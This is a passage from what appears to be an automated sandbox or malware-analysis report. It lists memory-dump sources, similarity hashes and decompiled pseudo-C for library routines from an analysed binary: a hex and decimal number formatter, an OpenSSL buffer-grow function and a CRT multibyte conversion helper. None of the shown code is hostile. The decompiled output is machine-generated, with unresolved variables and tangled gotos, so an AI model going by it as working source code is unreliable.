                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                              • String ID:
                                                              • API String ID: 4271482742-0
                                                              • Opcode ID: a7ad91d75c609496043dab45131ed0557868d40a8bc1f136563e242236ad7740
                                                              • Instruction ID: 4daa25dda84863e99945e0dceb4c05ef2b660ab3f591dae625598885d015be10
                                                              • Opcode Fuzzy Hash: a7ad91d75c609496043dab45131ed0557868d40a8bc1f136563e242236ad7740
                                                              • Instruction Fuzzy Hash: 8501DE72A00711FBCB21AB79D84AB5DB7A0BF44720F14800DF828A7390CB34AB41EBC5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00BA8040, Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 251COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 89%
                                                              			E00BA8040(intOrPtr __ecx, intOrPtr __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t106;
				signed int _t110;
				signed int _t111;
				char* _t112;
				signed char _t114;
				void* _t120;
				void* _t123;
				void* _t125;
				signed int _t127;
				void* _t128;
				char* _t130;
				void* _t131;
				void* _t132;
				signed int _t134;
				intOrPtr _t137;
				signed int _t139;
				intOrPtr _t140;
				intOrPtr _t142;
				signed int _t149;
				char _t151;
				signed int _t155;
				char _t160;
				signed int _t163;
				signed char _t165;
				signed int _t166;
				char* _t169;
				signed int _t174;
				intOrPtr _t176;
				intOrPtr _t177;
				intOrPtr _t179;
				signed int _t187;
				char* _t188;
				signed int _t189;
				intOrPtr _t190;
				intOrPtr _t192;
				signed int _t198;
				signed int _t201;
				signed int _t204;
				void* _t209;

				E00C6BB10(0x44);
				_t106 =  *0xcc5970; // 0x851ab4dd
				 *(_t204 + 0x40) = _t106 ^ _t204;
				_push(_t137);
				_t201 = 0;
				 *((intOrPtr*)(_t204 + 0x18)) =  *((intOrPtr*)(_t204 + 0x48));
				 *((intOrPtr*)(_t204 + 0x18)) = __ecx;
				 *((intOrPtr*)(_t204 + 0x14)) = __edx;
				 *(_t204 + 0x24) =  *(_t204 + 0x54);
				 *((intOrPtr*)(_t204 + 0x30)) = 0;
				 *(_t204 + 0x1c) = 0xc81291;
				 *(_t204 + 0x10) = 0;
				if( *(_t204 + 0x68) < 0) {
					 *((intOrPtr*)(_t204 + 0x70)) = 0;
				}
				_t165 =  *((intOrPtr*)(_t204 + 0x74));
				_t174 =  *(_t204 + 0x60);
				_t187 =  *(_t204 + 0x64);
				_t110 = _t174;
				_t149 = _t187;
				if((_t165 & 0x00000040) == 0) {
					_t209 = _t187 - _t201;
					if(_t209 > 0 || _t209 >= 0 && _t174 >= _t201) {
						if((_t165 & 0x00000002) == 0) {
							if((_t165 & 0x00000004) != 0) {
								 *((intOrPtr*)(_t204 + 0x30)) = 0x20;
							}
						} else {
							 *((intOrPtr*)(_t204 + 0x30)) = 0x2b;
						}
					} else {
						asm("adc esi, ebp");
						 *((intOrPtr*)(_t204 + 0x30)) = 0x2d;
						_t110 =  ~_t174;
						_t149 =  ~_t187;
					}
				}
				if((_t165 & 0x00000008) != 0) {
					_t198 =  *(_t204 + 0x68);
					if(_t198 != 8) {
						if(_t198 == 0x10) {
							 *(_t204 + 0x1c) = "0x";
						}
					} else {
						 *(_t204 + 0x1c) = "0";
					}
				}
				if((_t165 & 0x00000020) != 0) {
					 *(_t204 + 0x10) = 1;
				}
				goto L19;
				do {
					L28:
					_t151 =  *_t112;
					_t112 =  &(_t112[1]);
				} while (_t151 != 0);
				_t176 =  *((intOrPtr*)(_t204 + 0x30));
				_t155 =  *((intOrPtr*)(_t204 + 0x6c)) - (0 | _t176 != 0x00000000) - _t112 - _t169 - _t189;
				_t172 = 0;
				 *(_t204 + 0x28) = _t155;
				if(_t139 < 0) {
					 *(_t204 + 0x10) = 0;
				}
				if(_t155 < _t172) {
					 *(_t204 + 0x28) = _t172;
				}
				_t114 =  *((intOrPtr*)(_t204 + 0x74));
				if((_t114 & 0x00000010) != 0) {
					_t163 =  *(_t204 + 0x28);
					if( *(_t204 + 0x10) < _t163) {
						 *(_t204 + 0x10) = _t163;
					}
					 *(_t204 + 0x28) = _t172;
				}
				if((_t114 & 0x00000001) != 0) {
					 *(_t204 + 0x28) =  ~( *(_t204 + 0x28));
				}
				if( *(_t204 + 0x28) <= _t172) {
					L43:
					if(_t176 == 0) {
						L45:
						_t116 =  *( *(_t204 + 0x1c));
						if( *( *(_t204 + 0x1c)) == 0) {
							L49:
							if( *(_t204 + 0x10) <= 0) {
								L53:
								if(_t201 <= 0) {
									L56:
									if( *(_t204 + 0x28) >= 0) {
										L60:
										_pop(_t177);
										_pop(_t190);
										_pop(_t140);
										return E00C69C26(1, _t140,  *(_t204 + 0x40) ^ _t204, _t172, _t177, _t190);
									} else {
										while(1) {
											_t120 = E00BA7DE0( *((intOrPtr*)(_t204 + 0x20)),  *((intOrPtr*)(_t204 + 0x18)),  *((intOrPtr*)(_t204 + 0x14)),  *(_t204 + 0x24), 0x20);
											_t204 = _t204 + 8;
											if(_t120 == 0) {
												goto L61;
											}
											_t100 = _t204 + 0x28;
											 *_t100 =  *(_t204 + 0x28) + 1;
											if( *_t100 < 0) {
												continue;
											} else {
												goto L60;
											}
											goto L62;
										}
										goto L61;
									}
								} else {
									while(1) {
										_t160 =  *((char*)(_t204 + _t201 + 0x33));
										_t172 =  *(_t204 + 0x24);
										_t201 = _t201 - 1;
										_t123 = E00BA7DE0( *((intOrPtr*)(_t204 + 0x20)),  *((intOrPtr*)(_t204 + 0x18)),  *((intOrPtr*)(_t204 + 0x14)),  *(_t204 + 0x24), _t160);
										_t204 = _t204 + 8;
										if(_t123 == 0) {
											goto L61;
										}
										if(_t201 > 0) {
											continue;
										} else {
											goto L56;
										}
										goto L62;
									}
									goto L61;
								}
							} else {
								while(1) {
									_t125 = E00BA7DE0( *((intOrPtr*)(_t204 + 0x20)),  *((intOrPtr*)(_t204 + 0x18)),  *((intOrPtr*)(_t204 + 0x14)),  *(_t204 + 0x24), 0x30);
									_t204 = _t204 + 8;
									if(_t125 == 0) {
										goto L61;
									}
									_t127 =  *(_t204 + 0x10) - 1;
									 *(_t204 + 0x10) = _t127;
									if(_t127 > 0) {
										continue;
									} else {
										goto L53;
									}
									goto L62;
								}
								goto L61;
							}
						} else {
							while(1) {
								_t172 =  *(_t204 + 0x24);
								_t128 = E00BA7DE0( *((intOrPtr*)(_t204 + 0x20)),  *((intOrPtr*)(_t204 + 0x18)),  *((intOrPtr*)(_t204 + 0x14)),  *(_t204 + 0x24), _t116);
								_t204 = _t204 + 8;
								if(_t128 == 0) {
									goto L61;
								}
								_t130 =  &(( *(_t204 + 0x1c))[1]);
								 *(_t204 + 0x1c) = _t130;
								_t116 =  *_t130;
								if( *_t130 != 0) {
									continue;
								} else {
									goto L49;
								}
								goto L62;
							}
							goto L61;
						}
					} else {
						_t172 =  *(_t204 + 0x24);
						_t131 = E00BA7DE0( *((intOrPtr*)(_t204 + 0x20)),  *(_t204 + 0x1c),  *((intOrPtr*)(_t204 + 0x14)),  *(_t204 + 0x24), _t176);
						_t204 = _t204 + 8;
						if(_t131 == 0) {
							goto L61;
						} else {
							goto L45;
						}
					}
				} else {
					while(1) {
						_t132 = E00BA7DE0( *((intOrPtr*)(_t204 + 0x20)),  *((intOrPtr*)(_t204 + 0x18)),  *((intOrPtr*)(_t204 + 0x14)),  *(_t204 + 0x24), 0x20);
						_t204 = _t204 + 8;
						if(_t132 == 0) {
							break;
						}
						_t134 =  *(_t204 + 0x28) - 1;
						 *(_t204 + 0x28) = _t134;
						if(_t134 > 0) {
							continue;
						} else {
							_t176 =  *((intOrPtr*)(_t204 + 0x30));
							goto L43;
						}
						goto L62;
					}
					L61:
					_pop(_t179);
					_pop(_t192);
					_pop(_t142);
					return E00C69C26(0, _t142,  *(_t204 + 0x50) ^ _t204, _t172, _t179, _t192);
				}
				L62:
				L19:
				_t188 = "0123456789ABCDEF";
				if( *(_t204 + 0x10) == 0) {
					_t188 = "0123456789abcdef";
				}
				_t166 =  *(_t204 + 0x68);
				_t110 = E00C6CDA0(_t110, _t149, _t166, 0);
				 *((char*)(_t204 + _t201 + 0x34)) = _t188[_t149];
				_t149 = _t166;
				_t201 = _t201 + 1;
				 *((intOrPtr*)(_t204 + 0x2c)) = _t137;
				if((_t110 | _t149) == 0 || _t201 >= 0x1a) {
					if(_t201 == 0x1a) {
						_t201 = 0x19;
					}
					_t111 =  *((intOrPtr*)(_t204 + 0x70));
					_t139 = _t111 - _t201;
					 *((char*)(_t204 + _t201 + 0x34)) = 0;
					 *(_t204 + 0x10) = _t139;
					_t189 = _t111;
					if(_t111 < _t201) {
						_t189 = _t201;
					}
					_t112 =  *(_t204 + 0x1c);
					_t44 =  &(_t112[1]); // 0xc81292
					_t169 = _t44;
				} else {
					goto L19;
				}
				goto L28;
			}













































                                                              0x00ba8045
                                                              0x00ba804a
                                                              0x00ba8051
                                                              0x00ba8059
                                                              0x00ba805b
                                                              0x00ba8061
                                                              0x00ba806b
                                                              0x00ba806f
                                                              0x00ba8073
                                                              0x00ba8077
                                                              0x00ba807b
                                                              0x00ba8083
                                                              0x00ba8087
                                                              0x00ba8089
                                                              0x00ba8089
                                                              0x00ba808d
                                                              0x00ba8091
                                                              0x00ba8095
                                                              0x00ba8099
                                                              0x00ba809b
                                                              0x00ba80a0
                                                              0x00ba80a2
                                                              0x00ba80a4
                                                              0x00ba80c3
                                                              0x00ba80d2
                                                              0x00ba80d4
                                                              0x00ba80d4
                                                              0x00ba80c5
                                                              0x00ba80c5
                                                              0x00ba80c5
                                                              0x00ba80ac
                                                              0x00ba80ae
                                                              0x00ba80b2
                                                              0x00ba80ba
                                                              0x00ba80bc
                                                              0x00ba80bc
                                                              0x00ba80a4
                                                              0x00ba80df
                                                              0x00ba80e1
                                                              0x00ba80e8
                                                              0x00ba80f7
                                                              0x00ba80f9
                                                              0x00ba80f9
                                                              0x00ba80ea
                                                              0x00ba80ea
                                                              0x00ba80ea
                                                              0x00ba80e8
                                                              0x00ba8104
                                                              0x00ba8106
                                                              0x00ba8106
                                                              0x00ba810e
                                                              0x00ba8171
                                                              0x00ba8171
                                                              0x00ba8171
                                                              0x00ba8173
                                                              0x00ba8174
                                                              0x00ba8178
                                                              0x00ba818d
                                                              0x00ba818f
                                                              0x00ba8193
                                                              0x00ba8197
                                                              0x00ba8199
                                                              0x00ba8199
                                                              0x00ba819f
                                                              0x00ba81a1
                                                              0x00ba81a1
                                                              0x00ba81a5
                                                              0x00ba81ab
                                                              0x00ba81ad
                                                              0x00ba81b5
                                                              0x00ba81b7
                                                              0x00ba81b7
                                                              0x00ba81bb
                                                              0x00ba81bb
                                                              0x00ba81c1
                                                              0x00ba81c9
                                                              0x00ba81c9
                                                              0x00ba81d1
                                                              0x00ba8207
                                                              0x00ba8209
                                                              0x00ba822d
                                                              0x00ba8231
                                                              0x00ba8235
                                                              0x00ba8274
                                                              0x00ba8279
                                                              0x00ba82ac
                                                              0x00ba82ae
                                                              0x00ba82d8
                                                              0x00ba82dd
                                                              0x00ba8306
                                                              0x00ba8306
                                                              0x00ba8307
                                                              0x00ba830e
                                                              0x00ba831d
                                                              0x00ba82e0
                                                              0x00ba82e0
                                                              0x00ba82f3
                                                              0x00ba82f8
                                                              0x00ba82fd
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba82ff
                                                              0x00ba82ff
                                                              0x00ba8304
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba8304
                                                              0x00000000
                                                              0x00ba82e0
                                                              0x00ba82b0
                                                              0x00ba82b0
                                                              0x00ba82b0
                                                              0x00ba82b5
                                                              0x00ba82c5
                                                              0x00ba82c8
                                                              0x00ba82cd
                                                              0x00ba82d2
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba82d6
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba82d6
                                                              0x00000000
                                                              0x00ba82b0
                                                              0x00ba827b
                                                              0x00ba8280
                                                              0x00ba8293
                                                              0x00ba8298
                                                              0x00ba829d
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba82a3
                                                              0x00ba82a4
                                                              0x00ba82aa
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba82aa
                                                              0x00000000
                                                              0x00ba8280
                                                              0x00ba8237
                                                              0x00ba8240
                                                              0x00ba8240
                                                              0x00ba8255
                                                              0x00ba825a
                                                              0x00ba825f
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba8269
                                                              0x00ba826a
                                                              0x00ba826e
                                                              0x00ba8272
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba8272
                                                              0x00000000
                                                              0x00ba8240
                                                              0x00ba820b
                                                              0x00ba820b
                                                              0x00ba821d
                                                              0x00ba8222
                                                              0x00ba8227
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba8227
                                                              0x00ba81d3
                                                              0x00ba81d3
                                                              0x00ba81e6
                                                              0x00ba81eb
                                                              0x00ba81f0
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba81fa
                                                              0x00ba81fb
                                                              0x00ba8201
                                                              0x00000000
                                                              0x00ba8203
                                                              0x00ba8203
                                                              0x00000000
                                                              0x00ba8203
                                                              0x00000000
                                                              0x00ba8201
                                                              0x00ba831e
                                                              0x00ba8322
                                                              0x00ba8323
                                                              0x00ba8325
                                                              0x00ba8332
                                                              0x00ba8332
                                                              0x00000000
                                                              0x00ba8110
                                                              0x00ba8115
                                                              0x00ba811a
                                                              0x00ba811c
                                                              0x00ba811c
                                                              0x00ba8121
                                                              0x00ba8129
                                                              0x00ba8131
                                                              0x00ba8135
                                                              0x00ba8139
                                                              0x00ba813c
                                                              0x00ba8140
                                                              0x00ba814a
                                                              0x00ba814c
                                                              0x00ba814c
                                                              0x00ba8151
                                                              0x00ba8157
                                                              0x00ba815b
                                                              0x00ba8160
                                                              0x00ba8164
                                                              0x00ba8166
                                                              0x00ba8168
                                                              0x00ba8168
                                                              0x00ba816a
                                                              0x00ba816e
                                                              0x00ba816e
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: __aulldvrm
                                                              • String ID: $0123456789ABCDEF$0123456789abcdef
                                                              • API String ID: 1302938615-30751140
                                                              • Opcode ID: fa85810dd121a693f2e038cc99439077161b6e057ebaabaff50dfc4503dabc04
                                                              • Instruction ID: e599e50535c71ddeb5409a729784d59a3b286d665ab5d4b484b4070a8a56f454
                                                              • Opcode Fuzzy Hash: fa85810dd121a693f2e038cc99439077161b6e057ebaabaff50dfc4503dabc04
                                                              • Instruction Fuzzy Hash: E6917CB5A0C3418BDB14DE19D88562BB7E1EFCA754F1809ADF884A7701DB31EC498B92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00BA99A0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00BA99A0(void* __ebp, intOrPtr* _a4, intOrPtr _a8) {
				void* __ebx;
				void* __edi;
				intOrPtr _t21;
				intOrPtr _t37;
				intOrPtr* _t53;
				intOrPtr _t54;

				_t54 = _a8;
				_t53 = _a4;
				_t17 =  *_t53;
				if( *_t53 < _t54) {
					_t4 = _t53 + 8; // 0x44030447
					_t40 =  *_t4;
					if( *_t4 < _t54) {
						if(_t54 <= 0x5ffffffc) {
							_t6 = _t54 + 3; // 0xbab267
							_t37 = (0xaaaaaaab * _t6 >> 0x20 >> 1) + (0xaaaaaaab * _t6 >> 0x20 >> 1) + (0xaaaaaaab * _t6 >> 0x20 >> 1) + (0xaaaaaaab * _t6 >> 0x20 >> 1);
							if(( *(_t53 + 0xc) & 0x00000001) == 0) {
								_t14 = _t53 + 4; // 0x8b4b74c0
								_t21 = E00BA35B0(_t53, __ebp,  *_t14, _t40, _t37, "crypto\\buffer\\buffer.c", 0x86);
							} else {
								_t21 = E00BA9870(_t37, _t53, _t37);
							}
							if(_t21 != 0) {
								 *((intOrPtr*)(_t53 + 4)) = _t21;
								 *((intOrPtr*)(_t53 + 8)) = _t37;
								E00C6BB40(_t53,  *_t53 + _t21, 0, _t54 -  *_t53);
								 *_t53 = _t54;
								return _t54;
							} else {
								E00B98310(_t53, 7, 0x69, 0x41, "crypto\\buffer\\buffer.c", 0x88);
								return 0;
							}
						} else {
							E00B98310(_t53, 7, 0x69, 0x41, "crypto\\buffer\\buffer.c", 0x7f);
							return 0;
						}
					} else {
						_t5 = _t53 + 4; // 0x8b4b74c0
						E00C6BB40(_t53,  *_t5 + _t17, 0, _t54 - _t17);
						 *_t53 = _t54;
						return _t54;
					}
				} else {
					_t3 = _t53 + 4; // 0x8b4b74c0
					_t45 =  *_t3;
					if( *_t3 != 0) {
						E00C6BB40(_t53, _t45 + _t54, 0, _t17 - _t54);
					}
					 *_t53 = _t54;
					return _t54;
				}
			}









                                                              0x00ba99a1
                                                              0x00ba99a6
                                                              0x00ba99aa
                                                              0x00ba99ae
                                                              0x00ba99ce
                                                              0x00ba99ce
                                                              0x00ba99d3
                                                              0x00ba99f7
                                                              0x00ba9a13
                                                              0x00ba9a24
                                                              0x00ba9a2a
                                                              0x00ba9a37
                                                              0x00ba9a47
                                                              0x00ba9a2c
                                                              0x00ba9a2d
                                                              0x00ba9a32
                                                              0x00ba9a51
                                                              0x00ba9a7f
                                                              0x00ba9a82
                                                              0x00ba9a85
                                                              0x00ba9a8e
                                                              0x00ba9a94
                                                              0x00ba9a53
                                                              0x00ba9a63
                                                              0x00ba9a72
                                                              0x00ba9a72
                                                              0x00ba99f9
                                                              0x00ba9a06
                                                              0x00ba9a12
                                                              0x00ba9a12
                                                              0x00ba99d5
                                                              0x00ba99d5
                                                              0x00ba99e2
                                                              0x00ba99ea
                                                              0x00ba99f0
                                                              0x00ba99f0
                                                              0x00ba99b0
                                                              0x00ba99b0
                                                              0x00ba99b0
                                                              0x00ba99b5
                                                              0x00ba99bf
                                                              0x00ba99c4
                                                              0x00ba99c7
                                                              0x00ba99cd
                                                              0x00ba99cd

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: _memset
                                                              • String ID: crypto\buffer\buffer.c
                                                              • API String ID: 2102423945-2193715570
                                                              • Opcode ID: 6877865da874acf1a5763168aea1317bfe534e5a4a909616383b2cd2645e4588
                                                              • Instruction ID: ef872d8e56248ee44c077dbe61503d976af8af89fe348239c54f7d8884318f58
                                                              • Opcode Fuzzy Hash: 6877865da874acf1a5763168aea1317bfe534e5a4a909616383b2cd2645e4588
                                                              • Instruction Fuzzy Hash: 8E21F8B2B482113BD6106A68FC82B6AF3D9AB91F50F04857AF909D76C5D7B4AC5183D0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00BB17C0, Relevance: 6.4, APIs: 4, Instructions: 419COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d2d00c539795133b09a84fb53836ee2d241d62ac91e872d3dcde50671a70f351
                                                              • Instruction ID: 149200db6513496b0b88af98da2e1158ee54170b5c40a92c190da0bde32672ee
                                                              • Opcode Fuzzy Hash: d2d00c539795133b09a84fb53836ee2d241d62ac91e872d3dcde50671a70f351
                                                              • Instruction Fuzzy Hash: DFD188B5604204AFD714DF68CCA5EBBB7EDEBC9300F548A5CF98587205E671EC058BA2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00C7AD24, Relevance: 6.1, APIs: 4, Instructions: 103COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00C7AD24(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				int _t57;
				int _t58;
				signed short* _t59;
				short* _t60;
				int _t65;
				char* _t73;

				_t73 = _a8;
				if(_t73 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t73 != 0) {
						E00C6AE5D( &_v20, __edi, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E00C747E8( *_t73 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t73, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E00C6D8C9(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t65 =  *(_t56 + 0xac);
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								__eflags = _a12 -  *(_t56 + 0xac);
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t73[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								_t57 =  *(_t56 + 0xac);
								__eflags = _v8;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t73, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t73 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

















                                                              0x00c7ad2e
                                                              0x00c7ad35
                                                              0x00c7ad4c
                                                              0x00000000
                                                              0x00c7ad3c
                                                              0x00c7ad3e
                                                              0x00c7ad58
                                                              0x00c7ad5d
                                                              0x00c7ad60
                                                              0x00c7ad63
                                                              0x00c7ad8c
                                                              0x00c7ad93
                                                              0x00c7ad95
                                                              0x00c7ae16
                                                              0x00c7ae31
                                                              0x00c7ae33
                                                              0x00c7ad73
                                                              0x00c7ad73
                                                              0x00c7ad76
                                                              0x00c7ad78
                                                              0x00c7ad7b
                                                              0x00c7ad7b
                                                              0x00c7ad7b
                                                              0x00c7ad7b
                                                              0x00000000
                                                              0x00c7ad81
                                                              0x00c7adf5
                                                              0x00c7adf5
                                                              0x00c7adfa
                                                              0x00c7ae00
                                                              0x00c7ae03
                                                              0x00c7ae05
                                                              0x00c7ae08
                                                              0x00c7ae08
                                                              0x00c7ae08
                                                              0x00c7ae08
                                                              0x00000000
                                                              0x00c7ae0c
                                                              0x00c7ad97
                                                              0x00c7ad9a
                                                              0x00c7ada0
                                                              0x00c7ada3
                                                              0x00c7adca
                                                              0x00c7adcd
                                                              0x00c7add3
                                                              0x00000000
                                                              0x00000000
                                                              0x00c7add5
                                                              0x00c7add8
                                                              0x00000000
                                                              0x00000000
                                                              0x00c7adda
                                                              0x00c7adda
                                                              0x00c7ade0
                                                              0x00c7ade3
                                                              0x00c7ad51
                                                              0x00c7ad51
                                                              0x00c7adec
                                                              0x00000000
                                                              0x00c7adec
                                                              0x00c7ada5
                                                              0x00c7ada8
                                                              0x00000000
                                                              0x00000000
                                                              0x00c7adac
                                                              0x00c7adbd
                                                              0x00c7adc3
                                                              0x00c7adc5
                                                              0x00c7adc8
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00c7adc8
                                                              0x00c7ad65
                                                              0x00c7ad68
                                                              0x00c7ad6a
                                                              0x00c7ad70
                                                              0x00c7ad70
                                                              0x00000000
                                                              0x00c7ad40
                                                              0x00c7ad40
                                                              0x00c7ad45
                                                              0x00c7ad49
                                                              0x00c7ad49
                                                              0x00000000
                                                              0x00c7ad45
                                                              0x00c7ad3e

                                                              APIs
                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00C7AD58
                                                              • __isleadbyte_l.LIBCMT ref: 00C7AD8C
                                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000,?,?,?,00000000,?,00000000,00000000), ref: 00C7ADBD
                                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,00000000,00000000,?,?,?,00000000,?,00000000,00000000), ref: 00C7AE2B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                              • String ID:
                                                              • API String ID: 3058430110-0
